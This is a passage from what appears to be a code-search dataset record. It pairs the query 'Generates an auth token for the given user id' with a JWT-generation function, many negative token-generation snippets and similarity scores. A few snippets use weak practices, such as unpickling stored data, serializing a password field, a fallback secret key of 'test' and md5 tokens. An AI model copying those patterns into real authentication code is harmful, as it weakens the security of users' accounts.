self.id,\n 'name': self.name,\n 'userID': self.userID,\n }", "def serialize(self):\n\t\treturn { 'type': self.type, 'parameters' : self.parameters}", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def to_json(self) :\n return jsonpickle.encode(self)", "def dict(self):\n return self.data", "def getData(self):\n return pickle.loads(self._data)", "def to_json_string(self):\n\t\treturn json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + \"\\n\"", "def obj_payload(self):\n self._payload_to_obj()\n return self._obj_payload", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'description' : self.description,\n 'is_private' : self.is_private,\n }", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def get_raw_data(self):\n return self.__data", "def serialize(self) -> bytes:\n pass", "def serialize(self) -> bytes:\n pass", "def serialized_data(self):\n return {\n 'id': self.id,\n 'start_time': str(self.start_time),\n 'venue_id': self.venue_id,\n 'venue_name': self.venue.name,\n 'venue_image_link': self.venue.image_link,\n 'artist_id': self.artist_id,\n 'artist_name': self.artist.name,\n 'artist_image_link': self.artist.image_link\n }", "def serialized_data(self):\n return {\n 'id': self.id,\n 'city': self.name,\n 'state': self.state_name\n }", "def serialize(self):\r\n return (self.name, self.values)", "def __json_data__(self):\n if schema.is_dense(self.namespace):\n dense_records = dict()\n for field in Observation._fields:\n dense_records[field] = []\n\n for obs in self.data:\n for key, val in six.iteritems(obs._asdict()):\n dense_records[key].append(serialize_obj(val))\n\n return dense_records\n\n else:\n return [serialize_obj(_) for _ in self.data]", "def data(self):\n return self._data_dict", "def serialize(self):\n return {\n 'id' : self.id,\n 'description': self.description,\n 'longitude' : self.longitude,\n 'latitude' : self.latitude,\n 'created_on' : self.created_on,\n 'created_by' : self.created_by,\n 'likes' : self.likes\n }", "def persistence_serialize(self):\n raise NotImplementedError", "def data_object(self) -> any:\r\n\r\n return self.__data_object", "def toJSON(self):\n raise NotImplementedError()", "def serialize(self):\n return {\n 'lapyname': self.lapyname,\n 'speciality': self.speciality,\n 'ram': self.ram,\n 'storage': self.storage,\n 'warrenty': self.warrenty,\n 'price': self.price,\n 'rating': self.rating,\n 'date': self.date,\n 'id': self. 
id\n }", "def toJson(self):\r\n return self.__dict__", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date_time' : str(self.date_time),\n 'duration' : self.duration,\n 'highlights' : self.highlights,\n 'conference_id' : self.conference_id,\n 'type_of_session_id' : self.type_of_session_id,\n 'speaker_id' : self.speaker_id,\n 'location_id' : self.location_id,\n 'documents' : self.documents \n }", "def dumps(self):\n pass", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def serialize(self, data):\r\n if data is None:\r\n return None\r\n elif type(data) is dict:\r\n return serializer.Serializer(\r\n self.get_attr_metadata()).serialize(data, self.content_type())\r\n else:\r\n raise Exception(_(\"Unable to serialize object of type = '%s'\") %\r\n type(data))", "def get_data(self):\n return self.data", "def get_data(self):\n return self.data", "def get_data(self):\n return self.data", "def to_dict(self):\n return self._data_dict", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str, \n }", "def dump_payload(self, obj):\n return want_bytes(self.serializer.dumps(obj, **self.serializer_kwargs))", "def serialize(self):\n return {\n 'id' : self.id,\n 'session_id' : self.session_id,\n 'filename' : self.filename,\n 'filetype' : self.filetype\n }", "def serialize(self):\n\n return str(self)", "def serialize(self):\n\t\treturn {\n\t\t\t\"id\": self.id,\n\t\t\t\"name\": self.name\n\t\t}", "def serialize(self):\n\t\treturn {\n\t\t\t\"id\": self.id,\n\t\t\t\"name\": self.name\n\t\t}", "def __repr__(self):\n return str(self.data)", "def serialize(self):\n return {\n 'name' :self.name,\n 'points' :self.pts,\n 'id' :self.id,\n 'league_id':self.league_id,\n 'userID':self.user_id\n }", "def __str__(self):\n return str(self.serialize())", "def serialize(self):\n return{\n # 'date': self.date,\n 'date': self.date,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n 'date_added': self.date_added,\n }", "def __str__(self):\n return str(self.__data)", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'latitude': self.latitude,\n 'longitude': self.longitude\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'price': self.price,\n }", "def serialize(self):\n return {\n 'did' : self.did,\n 'name' : self.name,\n 'passwd' : self.passwd,\n 'email' : self.email,\n 'phone' : self.phone,\n 'addr_1' : self.addr_1,\n 'addr_2' : self.addr_2,\n 'city' : self.city,\n 'state' : self.state,\n 'zip' : self.zip,\n 'grade' : self.grade,\n }" ]
[ "0.7632179", "0.74436677", "0.7407177", "0.7401359", "0.7355684", "0.73262495", "0.7152773", "0.71378213", "0.7084737", "0.70828056", "0.70691866", "0.7051947", "0.7041008", "0.7032165", "0.7026014", "0.701268", "0.70110273", "0.69258404", "0.6858589", "0.68336546", "0.6828472", "0.68185455", "0.68062055", "0.68031085", "0.67994124", "0.679653", "0.6741318", "0.6733161", "0.6731945", "0.67198414", "0.66938835", "0.6686106", "0.6684824", "0.6676959", "0.6674545", "0.6671486", "0.66694736", "0.6653572", "0.66408724", "0.66364205", "0.6630836", "0.66292626", "0.6628282", "0.66219205", "0.6607731", "0.6607678", "0.6606469", "0.6606469", "0.6602698", "0.66022825", "0.65985507", "0.659214", "0.6589974", "0.6589831", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65865225", "0.65778846", "0.65778846", "0.6574096", "0.6563724", "0.655406", "0.6552043", "0.65494585", "0.6539902", "0.65161735", "0.6514207", "0.65029526", "0.6500962", "0.650052", "0.6494365", "0.64876986", "0.648665", "0.648665", "0.6473053", "0.64651936", "0.64651936", "0.64651936", "0.6463822", "0.6463595", "0.6456904", "0.6451542", "0.6444815", "0.64439934", "0.64439934", "0.64400166", "0.6438265", "0.6436541", "0.64289725", "0.64266634", "0.6425896", "0.6418006", "0.64160216", "0.6412184" ]
0.0
-1
Generates an auth token for the given user id.
def generateAuthToken(self): try: payload = { 'exp': datetime.utcnow() + timedelta(days=0, minutes=30), 'iat': datetime.utcnow(), 'sub': self.id } return jwt.encode(payload, current_app.config['SECRET_KEY'], algorithm='HS256').decode() except Exception as error: print(error) return error
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def token_generate(self, user_id):\n try:\n payload = {\n 'exp': datetime.utcnow() + timedelta(minutes=200),\n 'iat': datetime.utcnow(),\n 'sub': user_id\n }\n encoded_token = jwt.encode(\n payload, current_app.config['SECRET_KEY'], algorithm='HS256'\n )\n return encoded_token\n\n except Exception:\n return str(Exception)", "def generate_token(self, user_id):\n try:\n # set up a payload with an expiration time\n payload = {\n 'exp': datetime.utcnow() + timedelta(minutes=10),\n 'iat': datetime.utcnow(),\n 'sub': user_id\n }\n # create the byte string encoded token using payload and SECRET key\n jwt_string = jwt.encode(\n payload,\n SECRET_KEY,\n algorithm='HS256'\n )\n return jwt_string\n except Exception as e:\n # return an error in string format if an exception occurs\n return str(e)", "def generate_token(user):\n if JWT_AUTH:\n payload = JWT_PAYLOAD_HANDLER(user)\n return JWT_ENCODE_HANDLER(payload)\n else:\n token = Token.objects.create(user=user)\n token.save()\n return token", "def generate_token(user):\n try:\n # generate the auth token\n auth_token = User.encode_auth_token(user.id)\n response_object = {\n \"status\": \"success\",\n \"message\": \"Successfully registered.\",\n \"Authorization\": auth_token.decode(),\n }\n return response_object, 201\n except Exception as e:\n response_object = {\n \"status\": \"fail\",\n \"message\": \"Some error occurred. Please try again.\",\n }\n return response_object, 401", "def generate_token_for_user(user: User, expiration: datetime.timedelta=datetime.timedelta(days=7)):\n\n return generate_token({'id': user.id}, expiration)", "def generate_token(usr):\n token = jwt.encode({\"user\":usr, \"exp\":datetime.datetime.utcnow()\n + datetime.timedelta(minutes=30)}, KEY)\n user = User.update(token=token).where(User.username == usr)\n user.execute()\n return token", "def encode_auth_token(self, user_id):\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1, seconds=0),\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n return jwt.encode(\n payload,\n app.config.get('SECRET_KEY'),\n algorithm='HS256'\n )\n except Exception as e:\n return e", "async def _token(self, user: discord.User = None, user_id: int = None):\n # This is to be used with the registration URL so that it doesn't contain\n # the user's ID in cleartext. 
This is so that person A cannot trivially\n # generate person B's URL and assign them to person A's team.\n if not user:\n user = self.bot.get_user(user_id)\n hashh = await self.config.user(user).digest()\n if hashh is None:\n salt = await self.config.user(user).secret()\n if salt is None:\n salt = random_salt()\n await self.config.user(user).secret.set(salt)\n hashh = digest(user.id, salt)\n await self.config.user(user).digest.set(hashh)\n await self.config.set_raw('undigest', hashh, value=user.id)\n return hashh", "def encode_auth_token(user_id):\n rfexp = datetime.datetime.utcnow() + datetime.timedelta(days=1, seconds=5)\n exp = int(time.time()+600)\n try:\n payload = {\n 'exp': exp,\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n RFpayload = {\n 'exp': rfexp,\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n return jwt.encode(\n payload,\n key,\n algorithm='HS256'\n ), jwt.encode(\n RFpayload,\n key,\n algorithm='HS512'\n )\n except Exception as e:\n return e", "def generate_access_token(user_id, is_expired=False):\n\n iat = datetime.datetime.utcnow()\n\n return jwt.encode({\n 'sub': user_id, # Subject of this token\n 'iat': iat, # Issued at\n 'exp': iat + datetime.timedelta(hours=1) # Expired at\n if not is_expired\n else iat - datetime.timedelta(minutes=5)\n }, config.SECRET_KEY)", "def fetch_token(self, user_id, password):\n url = buildCommandUrl(self.server, \"/as/user/token\")\n result = json_request(\"POST\", url, {\n \"userId\": user_id,\n \"password\": password\n })\n return result[\"token\"]", "def get_client_token(secret_key, project_id, user):\n sign = hmac.new(six.b(str(secret_key)))\n sign.update(six.b(user))\n sign.update(six.b(str(project_id)))\n token = sign.hexdigest()\n return token", "def generate_new_token(uid):\n random_token = uuid.uuid4()\n token = TokenAuth(user_id=uid, token=random_token)\n token.save()\n return random_token", "def get_auth_token():\n token = g.user.generate_auth_token(24*3600)\n return jsonify({'user_id': g.user.id, 'token': token.decode('ascii')})", "def encode_auth_token(self,user_id): \n try: \n exp = datetime.utcnow() + timedelta(days=1)\n \n payload = {\n 'exp': exp, \n 'iat': datetime.utcnow(), \n 'sub': user_id\n }\n \n encoded_auth_token = jwt.encode(\n payload, \n getattr(settings, \"SECRET_KEY\",\"\"),\n algorithm='HS256'\n )\n return encoded_auth_token\n except Exception as e: \n print_exception(e)\n return e", "def generate_auth_token(self):\n token = Serializer(\n app.config['API_SECRET_KEY'],\n expires_in=app.config['JWT_TOKEN_EXPIRATION']\n )\n return token.dumps({'id': self.id})", "def generate_token(user: dict):\n\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1),\n 'iat': datetime.datetime.utcnow(),\n 'user': user\n }\n token = jwt.encode(\n payload,\n os.getenv('SECRET_KEY'),\n algorithm='HS256'\n )\n return token.decode('UTF-8')", "def access_token(global_config, existing_user, id_api):\n yield id_api.get_access_token_for_user(existing_user.email, existing_user.password)", "def generate_user(self):\n token = str(uuid.uuid4())\n return self.generate_subid(token=token, return_user=True)", "def generate_token(self):\n self.__get_auth_token_and_secret()\n return self.get_token()", "def GenerateAuthToken(key_name, user_id, action_id='', when=None):\n key = SecretKey.GetSecretKey(key_name)\n when = when or time_util.GetUTCNow()\n when_timestamp = time_util.ConvertToTimestamp(when)\n digester = hmac.new(key)\n digester.update(str(user_id))\n digester.update(_DELIMITER)\n 
digester.update(action_id)\n digester.update(_DELIMITER)\n digester.update(str(when_timestamp))\n digest = digester.digest()\n\n return base64.urlsafe_b64encode('%s%s%d' % (digest, _DELIMITER,\n when_timestamp))", "def create_token(user):\n payload = {\n 'sub': user.id,\n 'iat': datetime.utcnow(),\n 'exp': datetime.utcnow() + timedelta(days=1)\n }\n token = jwt.encode(payload, config.SECRET_KEY, algorithm='HS256')\n return token.decode('unicode_escape')", "def generate_user_api_key(user):\n now = datetime.datetime.utcnow()\n payload = {\n 'iss': 'minesweeper-api',\n 'aud': 'client',\n 'iat': now,\n 'nbf': now,\n 'exp': now + _get_api_token_exp_from_config(),\n 'user_id': str(user.id),\n 'is_admin': user.is_admin,\n }\n bytestring = jwt.encode(payload, _get_api_key_from_config())\n token = bytestring.decode('utf-8')\n return token", "def _create_auth_token(self, user=None):\n token, created = Token.objects.get_or_create(user=user)\n return token", "def encode_auth_token(secret_key, user_id):\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=60),\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n return jwt.encode(\n payload,\n secret_key,\n algorithm='HS256'\n )\n except Exception as e:\n return e", "def generate_token(self, user_id, roles, duration=\"2h\"):\n payload = {\"user\": user_id, \"roles\": roles , \"duration\": duration}\n self.headers['X-Rundeck-Auth-Token'] = self.api_token\n self.generate_token_response = requests.post(\n url=\"{}/tokens\".format(self.api),\n json=payload,\n headers=self.headers\n )", "def generate_token_from_user(user, expires_at=None):\n issued_at = datetime.utcnow()\n token = AccessToken()\n token.payload.update(\n {\n \"email\": user.email,\n \"exp\": expires_at or issued_at + timedelta(days=2),\n \"iat\": issued_at,\n \"language\": user.language,\n \"username\": user.username,\n \"full_name\": user.get_full_name(),\n }\n )\n return token", "def generate_auth_token(self, expires_in=600):\n return jwt.encode(\n {'loginid': self.loginid, 'exp': time.time() + expires_in},\n app.config['SECRET_KEY'], algorithm='HS256')", "def login_user(user_id):\n session_service.get_session_token(user_id)", "def gen_verification_token(user):\n exp_date = timezone.now() + timedelta(days=3)\n payload = {\n 'user': user.username,\n 'exp': int(exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n # Generacion del token\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n return token", "def encode_auth_token(self, id):\n payload = {\n \"exp\": datetime.utcnow()\n + timedelta(\n days=current_app.config.get(\"TOKEN_EXPIRATION_DAYS\"),\n seconds=current_app.config.get(\"TOKEN_EXPIRATION_SECONDS\"),\n ),\n \"iat\": datetime.utcnow(),\n \"sub\": id,\n }\n return jwt.encode(\n payload, current_app.config.get(\"SECRET_KEY\"), algorithm=\"HS256\"\n )", "def generate_auth_token(self, expires_in=600):\n return jwt.encode(\n {'STULOGINID': self.STULOGINID, 'exp': time.time() + expires_in},\n app.config['SECRET_KEY'], algorithm='HS256')", "def create_customer_token(self, _id):\n return self._get(\"/customer/{}/token\".format(_id))", "def get_auth_token_student():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def get_token(self, user):\n\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n payload = jwt_payload_handler(user)\n token = jwt_encode_handler(payload)\n return token", "def 
get_auth_token_teacher():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def gen_verification_token(user):\n exp_date = timezone.now() + timedelta(days= 3)\n payload = {\n 'user': user.username,\n 'exp': int (exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm= 'HS256')\n return token", "def gen_verification_token(user):\n exp_date = timezone.now() + timedelta(days=3)\n payload = {\n 'user': user.username,\n 'exp': int(exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n return token.decode()", "def auth_token_generate(identity_param_val, expires_delta=False):\n access_token = ''\n try:\n if expires_delta is not False:\n expires_delta = timedelta(minutes=expires_delta)\n access_token = create_access_token(identity=identity_param_val, expires_delta=expires_delta)\n except Exception as e:\n print(e)\n\n return access_token", "def identity_token_generator(app_key, app_secret, uid=None, role=None):\n return lambda nonce: generate_identity_token(app_key, app_secret, nonce, uid, role)", "def get_token():\n if g.current_user.is_anonymous or g.token_used:\n return unauthorized('Invalid credentials')\n return jsonify({'token': g.current_user.generate_auth_token(\n expiration=3600), 'expiration': 3600})", "def get_token():\n if g.current_user.is_anonymous or g.token_used:\n return unauthorized('Invalid credentials')\n return jsonify({'token': g.current_user.generate_auth_token(\n expiration=3600), 'expiration': 3600})", "def generate_auth_token(self, expiration):\n ser = Serializer(current_app.config['SECRET_KEY'],\n expires_in=expiration)\n return ser.dumps({'id': self.id}).decode('utf-8')", "def create_token(self,uid):\n token_str = self.get_random(5) + str(uid) + str(int(time.time()))\n m = hashlib.md5()\n m.update(token_str)\n return m.hexdigest()", "def _generate_jwt_token(self):\n import jwt\n from datetime import datetime, timedelta\n from django.conf import settings\n\n dt = datetime.now() + timedelta(days=60)\n\n token = jwt.encode({\n 'id': self.pk,\n 'username': self.username,\n 'exp': int(dt.strftime('%s')),\n }, settings.SECRET_KEY, algorithm='HS256')\n # print(token)\n return token", "def generate_identity_token(app_key, app_secret, nonce, uid=None, role=None):\n now = int(time.time())\n tok = {\n 'aak': app_key,\n 'iat': now,\n 'exp': now + 864000,\n 'nce': nonce,\n }\n\n if uid is not None:\n tok['uid'] = uid\n\n if role is not None:\n tok['role'] = role\n\n idt = jwt.encode(tok, app_secret, algorithm='HS256', headers={\n 'typ': 'JWS',\n 'cty': 'frankly-it;v1',\n })\n\n return six.text_type(idt, encoding='utf-8')", "def gen_verification_token(self, user):\n exp_date = timezone.now() + timedelta(days=3)\n payload = {\n 'user': user.username,\n 'exp': int(exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n return token", "def build_access_token_normal_user():\n return do_build_access_token(tenant_id='intility_tenant_id', admin=False)", "def generate_token():\n return uuid4()", "def encode_token(userId):\n token = jwt.encode({'userId': userId, 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=20)},\n secret_key).decode('utf-8')\n return token", "def get_token(id=None, name=None):\n\tif id is None and name is None:\n\t\tname = config['username']\n\treturn get_user(id=id, name=name, 
get_missing=False).token", "def encode_auth_token(user_id, email):\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=100, seconds=5),\n 'iat': datetime.datetime.utcnow(),\n 'sub': email + ' ' + str(user_id)\n }\n return jwt.encode(\n payload,\n key,\n algorithm='HS256'\n )\n except Exception as e:\n return e", "def create_auth_token(self, create_auth_token_details, user_id, **kwargs):\n resource_path = \"/users/{userId}/authTokens\"\n method = \"POST\"\n\n # Don't accept unknown kwargs\n expected_kwargs = [\n \"retry_strategy\",\n \"opc_retry_token\"\n ]\n extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]\n if extra_kwargs:\n raise ValueError(\n \"create_auth_token got unknown kwargs: {!r}\".format(extra_kwargs))\n\n path_params = {\n \"userId\": user_id\n }\n\n path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}\n\n for (k, v) in six.iteritems(path_params):\n if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):\n raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))\n\n header_params = {\n \"accept\": \"application/json\",\n \"content-type\": \"application/json\",\n \"opc-retry-token\": kwargs.get(\"opc_retry_token\", missing)\n }\n header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}\n\n retry_strategy = self.retry_strategy\n if kwargs.get('retry_strategy'):\n retry_strategy = kwargs.get('retry_strategy')\n\n if retry_strategy:\n if not isinstance(retry_strategy, retry.NoneRetryStrategy):\n self.base_client.add_opc_retry_token_if_needed(header_params)\n return retry_strategy.make_retrying_call(\n self.base_client.call_api,\n resource_path=resource_path,\n method=method,\n path_params=path_params,\n header_params=header_params,\n body=create_auth_token_details,\n response_type=\"AuthToken\")\n else:\n return self.base_client.call_api(\n resource_path=resource_path,\n method=method,\n path_params=path_params,\n header_params=header_params,\n body=create_auth_token_details,\n response_type=\"AuthToken\")", "def get_token(cls, user, full_result=False):\n if user is None:\n return EMPTY_KNOX_TOKEN\n result = AuthToken.objects.create(user=user)\n return result if full_result else result[1]", "def generate(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenGenerate)['token']", "def issue_user_token(user, salt):\r\n\r\n\t\tif user is not None:\r\n\t\t\tif (salt == 'login'):\r\n\t\t\t\ttoken, _ = Token.objects.get_or_create(user=user)\r\n\t\t\telse:\r\n\t\t\t\ttoken = signing.dumps({'pk': user.pk}, salt=salt)\r\n\r\n\t\t\treturn token\r\n\r\n\t\treturn None", "def make_token(self, user):\n return super()._make_token_with_timestamp(user, int(time.time()))", "def get_user_access_token(self, user_id, give_json=False):\n url = Constants.BASE_URL + 'domains/users/accesstokens'\n response = requests.get(url=url,\n params={'key': self.api_key, 'domain_api_secret': self.api_secret, 'user_id': user_id})\n json_obj = response.json()\n self.user_access_token = json_obj[\"result\"][\"user_access_token\"]\n if give_json:\n return json_obj\n else:\n return response.text", "def UserToken(self) -> object:", "def generate_new_token(self):\n self.access_token = random_auth_key()", "def get_auth_token(self, fb_auth_token, fb_user_id):\n\n endpoint = '/auth'\n params = {\n 'facebook_token': fb_auth_token,\n 'facebook_id': fb_user_id\n }\n res = self.post_request(endpoint, params)\n x_auth_token = res[\"token\"]\n 
return x_auth_token", "def generate_access_token(self):\n return gen_api_key(length=self.token_length)", "def grant_token(request):\n\n grant_token_svc = request.find_service(name=\"grant_token\")\n h_user = request.lti_user.h_user\n\n return {\"grant_token\": grant_token_svc.generate_token(h_user)}", "def _generate_jwt_token(self):\n dt = datetime.now() + timedelta(days=60)\n\n token = jwt.encode({\n 'id': self.pk,\n 'exp': int(dt.strftime('%s'))\n }, settings.SECRET_KEY, algorithm='HS256')\n\n return token.decode('utf-8')", "def get_token(self):\n\t\tself.client.post('/api/v1/auth/signup', data=json.dumps(self.signup_user), content_type='application/json')\n\t\tresponse = self.client.post('/api/v1/auth/login', data=json.dumps(self.login_user), content_type='application/json')\n\t\tresp = json.loads(response.data.decode())\n\t\treturn 'Bearer ' + resp['access_token']", "def generate_jwt(self):\n\n # Generate a random token\n random_token = secrets.token_hex(12)\n\n # Update database\n self.user_in_db.update({'token': random_token})\n User.users_db.put(self.user_in_db)\n\n # Create timestamps for the token\n generated = time.time()\n expires = generated + TWO_WEEKS\n\n # Return the generated jwt\n return manage_tokens.encode({\n 'email': self.email,\n 'token': random_token,\n 'generated': generated,\n 'expires': expires,\n })", "def async_token_result(auth_req_id):\n\n # create a new user based on auth request so that each auth request returns a different token\n new_user_params = {\n 'zenkey_sub': auth_req_id,\n 'name': 'Mock User',\n 'phone_number': '+15555555555',\n 'postal_code': '55555',\n 'email': 'mockuser@mock.user',\n 'username': 'mockuser',\n 'password': 'mockuser'\n }\n new_user = UserModel.create_new_user(new_user_params)\n jwt_token = create_jwt(new_user,\n current_app.config['TOKEN_EXPIRATION_TIME'],\n current_app.config['BASE_URL'],\n current_app.config['SECRET_KEY'])\n\n return jsonify({\n 'auth_req_id': auth_req_id,\n 'token': jwt_token,\n 'token_type': 'bearer',\n # we omit the refresh token for brevity in this example codebase\n 'refresh_token': 'omitted',\n 'expires': current_app.config['TOKEN_EXPIRATION_TIME'].total_seconds()\n })", "def create_token(user):\n access_token = create_access_token(user)\n payload = jwt.decode(\n access_token,\n app.config['JWT_SECRET_KEY'],\n algorithms=app.config['JWT_DECODE_ALGORITHMS'])\n data = {\n 'token':access_token,\n 'username': user.username,\n }\n data.update(payload)\n data['exp'] = datetime.fromtimestamp(data['exp'])\n app.logger.debug(str(data))\n if app.config.get('KEEP_TOKEN'):\n # deletes old tokens\n tokens = app.data.driver.db[config.DOMAIN['token']['datasource']['source']]\n tokens.delete_many({'username': user.username})\n # insets new token\n result = app.data.insert('token', data)\n return access_token, str(result[0])\n\n return access_token, None", "def _get_token(self):\n return user.get_token()", "def get_token(self, obj):\n\n user = User.objects.get(email=obj.email)\n\n payload = jwt_payload_handler(user)\n\n if api_settings.JWT_ALLOW_REFRESH:\n payload['orig_iat'] = timegm(\n datetime.utcnow().utctimetuple()\n )\n\n token = jwt_encode_handler(payload)\n\n return token", "def generate_token(user, expire_time=86400):\n session = Session()\n token = session.query(PasswordRecoveryToken)\\\n .filter(PasswordRecoveryToken.user_id == user.user_id)\\\n .first()\n\n if token is not None:\n self.expire(token)\n \n token = PasswordRecoveryToken()\n token.user_id = user.user_id\n session.add(token)\n \n token.expiration = 
datetime.now() + timedelta(seconds=expire_time)\n \n sha_token = hashlib.sha224(user.login)\n sha_token.update(user.password)\n sha_token.update(str(token.expiration))\n \n token.token = sha_token.hexdigest()\n print token.token\n return token", "def generate_authentication_code(user):\n\n salt = 'd9!1l@39#c3'\n\n expire_timestamp = time.time() + EXPIRE_TIME_LIMIT\n # Make a string which depends on restaurant id\n # Same encoding mechanism will be used in seerpod hardware\n\n composite_string = \"%s%s%s\" % (user.id, user.password, salt)\n\n str_hex = hashlib.md5(composite_string).hexdigest()\n decoded_str = str(user.owner_email_id) + str(user.id) + \"_\" + str(expire_timestamp) + \"_\" + str_hex\n\n # Encoded string will be a multiple line string, if it is greater\n # than maximum bin size of 76. Browser strips the newline character\n # in the url.\n encoded = base64.encodestring(decoded_str).strip().replace('\\n', '')\n return encoded", "def build_token_with_uid(app_id, app_certificate, channel_name, uid, role, token_expire, privilege_expire=0):\n return RtcTokenBuilder.build_token_with_user_account(app_id, app_certificate, channel_name, uid, role,\n token_expire, privilege_expire)", "def generate_auth_token(self):\n s = Serializer(app.config['SECRET_KEY'])\n return s.dumps({'email': self.email})", "def _create_user(userid, **kw):\n\n new_user = User(userid, **kw)\n USERS[new_user.token] = new_user\n return USERS[new_user.token]", "def create_token(request, user):\n\n key = get_random_string(100)\n data = {}\n ip = get_client_ip_address(request)\n\n return Token.objects.create(user=user, key=key, data=json.dumps(data), ip=ip)", "def generate_token(exp=None):\n\n secret_key = getenv('JWT_SECRET_KEY')\n user = {\n 'first_name': fake.name(),\n 'last_name': fake.name(),\n 'email': fake.email(),\n 'is_admin': IsAdmin.yes,\n 'password': fake.password()\n }\n\n payload = {'id': str(User.find_or_create(user, email=user['email']).id)}\n payload.__setitem__('exp', exp) if exp is not None else ''\n token = jwt.encode(payload, secret_key, algorithm='HS256').decode(CHARSET)\n return 'Bearer {0}'.format(token)", "def generate_token(self):\n try:\n # set up a payload with an expiration time\n payload = {\n 'exp': datetime.utcnow() + timedelta(days=100),\n 'iat': datetime.utcnow(),\n 'sub': self.id\n }\n # create the byte string token using the payload and the SECRET key\n jwt_bytes = jwt.encode(\n payload,\n os.environ.get('SECRET', 'test'),\n algorithm='HS256'\n )\n return jwt_bytes.decode('utf-8')\n except Exception as e:\n # return an error in string format if an exception occurs\n raise Exception(str(e))", "def gettoken(tool_id, user_id):\n oauth_tokens = {\n 'access_token': '',\n 'user': {\n 'id': user_id\n }\n }\n params = {\n 'user_id': user_id\n }\n tokenq = \"\"\"select\naccess_token, refresh_token, expires_at, token_type, expires_in, user_name\nfrom tokens\nwhere user_id = :user_id\norder by expires_at desc\n\"\"\"\n tconn = dbconnect(CONFIG[CONFIG['app']['dbserver']])\n tcurr = tconn.cursor()\n try:\n results = tcurr.execute(tokenq, params).fetchone()\n except cx_Oracle.DatabaseError as err:\n LOG.error(\"Database error in retrieving tokens: %s\", err)\n\n if tcurr.rowcount > 0:\n oauth_tokens = {\n 'access_token': results[0],\n 'refresh_token': results[1],\n 'expires_at': results[2],\n 'token_type': results[3],\n 'expires_in': results[4],\n 'user': {\n 'name': results[5],\n 'id': user_id\n }\n }\n else:\n LOG.error(\"no token found for \" + str(tool_id) + ', ' + user_id)\n tcurr.close()\n 
tconn.close()\n return oauth_tokens", "def create_password_reset_token(self, user_id):\n try:\n self.logger.debug('Password Reset attempt %s', user_id)\n password_reset_token = ''\n nosqldb = self.pers.nosql_db\n db_user_record = nosqldb['users'].find_one(\n {\n '$or': [\n {'username': user_id},\n {'email': user_id}\n ]\n }\n )\n # Confirm the user exists from previous query\n if db_user_record:\n # purge any old requests, even if unrelated\n nosqldb['passwordResets'].delete_many(\n {\n 'requestDate': {'$lt': datetime.datetime.utcnow() -\n datetime.timedelta(minutes=5)}\n }\n )\n\n already_sent = nosqldb['passwordResets'].find_one(\n {\n 'email': user_id\n }\n )\n if not already_sent:\n # create a password reset token\n #password_reset_token = hashlib.sha512('abc'.encode('utf-8')).hexdigest()\n password_reset_token = secrets.token_urlsafe(255)\n #persist the password reset request\n nosqldb['passwordResets'].insert_one(\n {\n 'username': db_user_record['username'],\n 'email': db_user_record['email'],\n 'requestDate': datetime.datetime.utcnow(),\n 'resetToken': password_reset_token,\n }\n )\n else:\n self.logger.debug('Password Reset Email Denied: existing request in flight')\n return password_reset_token\n except Exception as exc:\n self.logger.debug('Unexpected Error %s', str(exc))\n raise", "def token_auth(self):\n self.client = APIClient()\n self.user = User.objects.create_user(username='testuser', email='test@test.com', password='testpassword')\n self.token = Token.objects.create(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)", "def __retrieve_rt_token(user_id):\n\n slack_user = user_profile(user_id)\n if slack_user['ok']:\n username = slack_user['user']['profile'].get('email', '').split('@')[0]\n user = get_user_model().objects.filter(username=username).first()\n if user:\n prefs = 